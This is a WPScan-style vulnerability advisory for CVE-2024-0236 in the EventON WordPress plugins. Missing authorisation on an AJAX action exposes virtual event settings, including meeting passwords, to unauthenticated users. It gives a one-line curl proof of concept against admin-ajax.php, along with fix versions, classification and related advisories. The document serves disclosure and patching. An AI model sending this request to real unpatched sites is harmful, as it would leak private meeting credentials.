EventON (Free < 2.2.8, Premium < 4.5.5) – Unauthenticated Virtual Event Password Disclosure | CVE 2024-0236

Description

The plugins do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the settings of arbitrary virtual events, including any meeting password set (for example for Zoom)

Proof of Concept

curl -X POST --data "eid=240" 'http://127.0.0.1/wp-admin/admin-ajax.php?action=eventon_config_virtual_event'

240 being the ID of a virtual event

Affects Plugins

eventON

Fixed in 4.5.5

eventon-lite

Fixed in 2.2.8

References

CVE

CVE-2024-0236

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CWE-862

CVSS

5.9 (medium)

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

09aeb6f2-6473-4de7-8598-e417049896d7

Timeline

Publicly Published

2024-01-10 (about 1 year ago)

Added

2024-01-10 (about 1 year ago)

Last Updated

2024-01-10 (about 1 year ago)

Other

Published

Title

Published

2023-01-10

Title

Royal Elementor Addons < 1.3.60 - Subscriber+ Arbitrary Template Activation

Published

2025-12-05

Title

Listar – Directory Listing & Classifieds WordPress Plugin <= 3.0.0 - Missing Authorization to Authenticated (Subscriber+) Listing Update

Published

2024-08-20

Title

WP Testimonial Widget <= 3.1 - Missing Authorization

Published

2024-04-05

Title

Bricksforge < 2.1.1 - Missing Authorization to Unauthenticated WordPress Settings Update

Published

2025-03-25

Title

WP Compress < 6.30.16 - Authenticated (Subscriber+) Missing Authorization via Multiple Functions